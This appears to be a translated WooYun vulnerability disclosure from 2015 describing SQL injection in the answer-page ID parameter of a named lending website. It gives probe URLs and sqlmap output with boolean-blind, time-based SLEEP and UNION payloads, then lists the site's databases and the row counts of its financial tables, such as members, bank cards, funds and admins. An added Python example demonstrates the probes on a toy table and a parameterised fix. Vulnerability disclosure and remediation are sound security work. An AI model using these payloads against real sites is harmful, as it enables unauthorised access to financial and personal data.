WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-05-11: Details sent to the vendor, awaiting the vendor's handling
2015-05-13: Vendor has confirmed; details disclosed to the vendor only
2015-05-23: Details disclosed to core white hats and experts in the relevant field
2015-06-02: Details disclosed to ordinary white hats
2015-06-12: Details disclosed to intern white hats
2015-06-27: Details disclosed to the public
This one is again a pseudo-static parameter: http://www.caizhimofang.com/Home/Answer/answer/id/15
Payload:
http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*1%3d6%20AND%20789%3d789
http://www.caizhimofang.com/Home/Answer/answer/id/15%20AND%203*2*2%3d6%20AND%20789%3d789
The vulnerability is confirmed to exist.
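As an added illustration (not code from the original report or from the affected site) of why the pseudo-static `/id/15` segment above is still attacker-controlled input, and what the handler should look like instead, the following runs the report's own two probe URLs against a constructed in-memory SQLite table; the table name, column names, the ThinkPHP-style path layout and the helper names are assumptions, and SQLite stands in for the MySQL back end sqlmap identified.

```python
import re
import sqlite3
from urllib.parse import unquote

# The two probe URLs quoted in the report: the first appends a true condition
# (3*2*1=6), the second a false one (3*2*2=6). Only the page contents differ.
TRUE_PROBE = "/Home/Answer/answer/id/15%20AND%203*2*1%3d6%20AND%20789%3d789"
FALSE_PROBE = "/Home/Answer/answer/id/15%20AND%203*2*2%3d6%20AND%20789%3d789"


def make_db():
    """Constructed stand-in table (assumed schema, not the site's real one)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE answer (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO answer VALUES (?, ?)",
                     [(15, "answer fifteen"), (16, "answer sixteen")])
    return conn


def path_params(path):
    """Split a ThinkPHP-style path (/Module/Controller/action/key/value/...)
    into its key/value pairs. Looking 'static' does not make the values safe."""
    segments = [unquote(s) for s in path.strip("/").split("/")]
    kv = segments[3:]
    return dict(zip(kv[0::2], kv[1::2]))


def is_valid_id(raw_id):
    """Allow-list check: a short run of digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", raw_id) is not None


def lookup_vulnerable(conn, path):
    """Concatenates the raw segment into the WHERE clause, as the report implies."""
    sql = "SELECT body FROM answer WHERE id = " + path_params(path)["id"]
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, path):
    """Validates the segment, then binds it as a parameter; a rejected value
    should become an HTTP 400, not a query."""
    raw_id = path_params(path)["id"]
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT body FROM answer WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, TRUE_PROBE), lookup_vulnerable(db, FALSE_PROBE))
```

In the vulnerable version the true probe returns the same row as the plain request and the false probe returns nothing, which is exactly the response difference a boolean-based blind test relies on; the hardened version never lets the probe reach the database.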
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) AND 1717=1717 AND (8702=8702

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) AND (SELECT * FROM (SELECT(SLEEP(5)))NhZP) AND (1042=1042

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://www.caizhimofang.com:80/Home/Answer/answer/id/15) UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x5958685a75757a77564c,0x7176627a71),NULL,NULL,NULL,NULL-- 
---
web application technology: Apache 2.4.9
back-end DBMS: MySQL 5.0.12
available databases [8]:
[*] bak
[*] bbs
[*] bjdev
[*] information_schema
[*] mysql
[*] newcfp
[*] performance_schema
[*] test
Database: newcfp
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| cy_funds             | 271870  |
| cy_redpackage        | 180874  |
| cy_paydetail         | 152530  |
| cy_lend              | 146739  |
| cy_message           | 131349  |
| cy_credit_log        | 73933   |
| cy_member            | 32455   |
| cy_custbase          | 30857   |
| cy_account           | 30856   |
| cy_funds_balance     | 30850   |
| cy_phone_attribution | 29722   |
| cy_award_log         | 13422   |
| cy_credit            | 13289   |
| cy_authrecord        | 13287   |
| cy_asset             | 13286   |
| cy_family            | 13286   |
| cy_workinfo          | 13286   |
| cy_withdrayapply     | 10486   |
| cy_bankcard          | 9810    |
| cy_choujiang         | 5361    |
| cy_shortmessage      | 3819    |
| cy_sign              | 2921    |
| cy_billno            | 1722    |
| cy_award_user        | 1674    |
| cy_contract_pic      | 1236    |
| cy_borrow            | 1062    |
| cy_mempoints_log     | 673     |
| cy_personal_pic      | 589     |
| cy_wx_drawmessage    | 456     |
| cy_ent_pic           | 435     |
| cy_reg               | 386     |
| cy_city              | 365     |
| cy_news              | 358     |
| cy_auth_log          | 293     |
| cy_estate_pic        | 254     |
| cy_cardlist          | 148     |
| cy_crights           | 119     |
| cy_statistic_bid     | 86      |
| cy_estate            | 72      |
| cy_insurance         | 48      |
| cy_fundtype          | 36      |
| cy_auth_rule         | 35      |
| cy_enterprice        | 33      |
| cy_province          | 31      |
| cy_activity_award    | 29      |
| cy_answer            | 23      |
| cy_question_tag      | 22      |
| cy_bank              | 20      |
| cy_question          | 20      |
| cy_industry          | 19      |
| cy_borrow_draft      | 13      |
| cy_wx_users          | 13      |
| cy_admin             | 11      |
| cy_auth_group_access | 10      |
| cy_category          | 10      |
| cy_borrowtype        | 9       |
| cy_score_rule        | 8       |
| cy_auth_group        | 7       |
| cy_member_grade      | 7       |
| cy_modules           | 7       |
| cy_area              | 6       |
| cy_tags              | 5       |
| cy_union_account     | 4       |
| cy_award             | 2       |
| cy_email             | 2       |
| cy_sms_user          | 2       |
| cy_activity          | 1       |
| cy_auth_group_user   | 1       |
| cy_autobidstand      | 1       |
| cy_enter_finareport  | 1       |
+----------------------+---------+
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-05-13 09:21
Much appreciated.
None yet.